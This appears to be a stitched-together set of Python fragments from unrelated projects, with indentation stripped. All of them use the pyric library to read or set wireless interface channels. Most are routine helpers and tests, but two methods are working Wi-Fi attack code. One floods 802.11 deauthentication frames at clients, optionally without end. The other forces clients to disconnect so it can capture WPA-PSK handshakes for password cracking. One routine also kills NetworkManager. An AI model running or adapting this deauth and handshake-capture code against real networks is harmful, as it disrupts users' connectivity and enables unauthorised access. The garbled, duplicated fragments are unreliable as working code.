def check_chset(interface: Union[str, pyw.Card], channel: int) -> pyw.Card:
interface = _get_card(interface)
if pyw.chget(interface) != channel:
pyw.chset(interface, channel)
return interface
def run(self, args, cmd):
self.cmd = cmd
with db_session:
bss = cmd.select_bss(args.ssid, args.bssid, args.client)
if bss:
if not args.bssid:
args.bssid = bss.bssid
if args.channel is None:
args.channel = bss.channel
if args.bssid is None:
cmd.perror("BSSID is missing, and couldn't be obtained from the recon db.")
elif args.channel is None:
cmd.perror("Channel is missing, and couldn't be obtained from the recon db.")
else:
interface = set_monitor_mode(args.iface)
if args.channel > 0:
check_chset(interface, args.channel)
else:
args.channel = pyw.chget(interface)
deauth_frame = RadioTap() / Dot11(addr1=args.client, addr2=args.bssid, addr3=args.bssid) / Dot11Deauth(
reason="class3-from-nonass")
args.num_frames = "infinite" if args.num_frames <= 0 else args.num_frames * 64
if compare_macs(args.client, BROADCAST_MAC):
cmd.pfeedback(
"[i] Sending {} deauth frames to all clients from AP {} on channel {}...".format(args.num_frames,
args.bssid,
args.channel))
else:
cmd.pfeedback(
"[i] Sending {} deauth frames to client {} from AP {} on channel {}...".format(args.num_frames,
args.client,
args.bssid,
args.channel))
if args.num_frames == "infinite":
self.inf_running = True
prev_sig_handler = signal.signal(signal.SIGINT, self.sig_int_handler)
cmd.pfeedback("[i] Press ctrl-c to stop.")
while self.inf_running:
try:
sendp(deauth_frame, iface=args.iface, count=64, inter=0.002)
except:
pass
sleep(0.5)
signal.signal(signal.SIGINT, prev_sig_handler)
else:
sendp(deauth_frame, iface=args.iface, count=args.num_frames, inter=0.002)
def test_chsetget(self):
pyw.down(self.card)
pyw.modeset(self.card, "monitor")
pyw.up(self.card)
self.assertEqual(None, pyw.chset(self.card, 1))
self.assertIsInstance(pyw.chget(self.card), int)
pyw.down(self.card)
pyw.modeset(self.card, "managed")
pyw.up(self.card)
def test_chsetget(self):
pyw.down(self.card)
pyw.modeset(self.card,'monitor')
pyw.up(self.card)
self.assertEqual(None,pyw.chset(self.card,1))
self.assertIsInstance(pyw.chget(self.card),int)
pyw.down(self.card)
pyw.modeset(self.card,'managed')
pyw.up(self.card)
def get_channel(self, ifaceName, **kwargs):
"""
Get the current used Rf channel number according to IEEE 802.11 spec
:param ifaceName: name of interface
:param kwargs: optional arg
:return: the channel number
"""
self.log.info('Get channel for {}:{}'.format(ifaceName, self.device))
w0 = self.get_wifi_chard(ifaceName) # get a card for interface
self.channel = pyw.chget(w0)
return self.channel
def set_monitor_mode(interface):
"""
Set interface in mode monitor an set channel 1
"""
interface = pyw.getcard(interface)
if pyw.modeget(interface) != "monitor":
if pyw.isup(interface):
pyw.down(interface)
pyw.modeset(interface, "monitor")
if not pyw.isup(interface):
pyw.up(interface)
if pyw.chget(interface) != 1:
pyw.chset(interface, 1)
def __init__(self, args):
self.mPackets = 0
self.clients = []
self.APs = []
self.firstPass = True
self.mIgnoreList = [
'ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:',
'01:80:c2:00:00:00', '01:00:5e:', '01:00:0c'] + \
[pyw.macget(pyw.getcard(x)) for x in pyw.winterfaces()] + \
[x for x in args['skip'] if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", x.lower())]
# Args
self.mInterface = args["interface"]
self.mFrequency = args["frequency"]
self.mChannels = args["channel"]
self.mKill = args["kill"]
self.mDirected = args["directed"]
self.mTargets = [x for x in args['targets'] if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", x.lower())]
self.mMaximum = int(args["maximum"])
self.mPackets = int(args["pkts"])
self.mTimeout = float(args["timeout"])
self.mChannel = pyw.chget(pyw.getcard(self.mInterface))
self.mDetailed = args['details']
self.mLoglevel = args['loglevel']
self.mSSID = args['ssid']
LogLevels={'info': logging.INFO, 'error': logging.ERROR, 'debug': logging.DEBUG, 'critical': logging.CRITICAL}
logging.basicConfig(
level=LogLevels[self.mLoglevel],
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%Y/%m/%d %H:%M:%S')
if self.mFrequency == "2":
self.mChannels = [int(x) for x in self.mChannels if int(x) in range(1, 12)]
if self.mChannels == []:
self.mChannels = list(range(1, 12))
elif self.mFrequency == "5":
self.mChannels = [int(x) for x in self.mChannels if int(x) in five_hertz]
if self.mChannels == []:
self.mChannels = five_hertz
else:
self.mChannels = [int(x) for x in self.mChannels if int(x) in range(1, 12) or int(x) in five_hertz]
if self.mChannels == []:
self.mChannels = list(range(1, 12)) + five_hertz
if pyw.modeget(self.mInterface) != 'monitor':
logging.debug('Enabling monitor mode on interface '+self.mInterface)
start_mon_mode(self.mInterface)
if self.mKill:
os.system('pkill NetworkManager')
conf.iface = self.mInterface
return
def run(self, args, cmd):
with db_session:
bss = cmd.select_bss(args.ssid, args.bssid, args.client)
if bss:
if not ("WPA" in bss.encryption_types
and "PSK" in bss.authn_types):
cmd.perror(
"[!] Selected AP encryption mode is not WPA[2]-PSK.")
if not args.bssid:
args.bssid = bss.bssid
if args.channel is None:
args.channel = bss.channel
if args.bssid is None:
cmd.perror(
"BSSID is missing, and couldn't be obtained from the recon db."
)
elif args.channel is None:
cmd.perror(
"Channel is missing, and couldn't be obtained from the recon db."
)
else:
interface = set_monitor_mode(args.iface)
if args.channel > 0:
check_chset(interface, args.channel)
else:
args.channel = pyw.chget(interface)
args.all_clients = compare_macs(args.client, BROADCAST_MAC)
self.clear_caches()
self.args = args
self.cmd = cmd
if not args.no_deauth:
script_args = argparse.Namespace()
script_args.deauth_args = to_args_str({
"iface": args.iface,
"bssid": args.bssid,
"channel": 0,
"client": args.client
# "num-frames": 1
})
super().run(script_args, cmd)
else:
cmd.pfeedback("[i] Disabled client(s) deauthentication.")
if args.all_clients:
cmd.pfeedback(
"[i] Monitoring for {} secs on channel {} WPA handshakes between all clients and AP {}..."
.format(args.sniff_time, args.channel, args.bssid))
else:
cmd.pfeedback(
"[i] Monitoring for {} secs on channel {} WPA handshakes between client {} and AP {}..."
.format(args.sniff_time, args.channel, args.client,
args.bssid))
sniff(iface=args.iface,
prn=self.handle_packet,
timeout=args.sniff_time,
store=False,
stop_filter=lambda x: self.complete_handshake)
def get_channel(self):
return pyw.chget(self.card)
def get_channel(self):
try:
return pyw.chget(self.card)
except:
return None
def get_channel(interface):
return pyw.chget(pyw.getcard(interface))
def get_channel(self):
try:
return pyw.chget(self.card)
except:
return None
def get_current_channel(self):
w0 = pyw.getcard(self.iface)
return pyw.chget(w0)
def gchan(card):
try:
return pyw.chget(card)
except pyric.error:
return 0
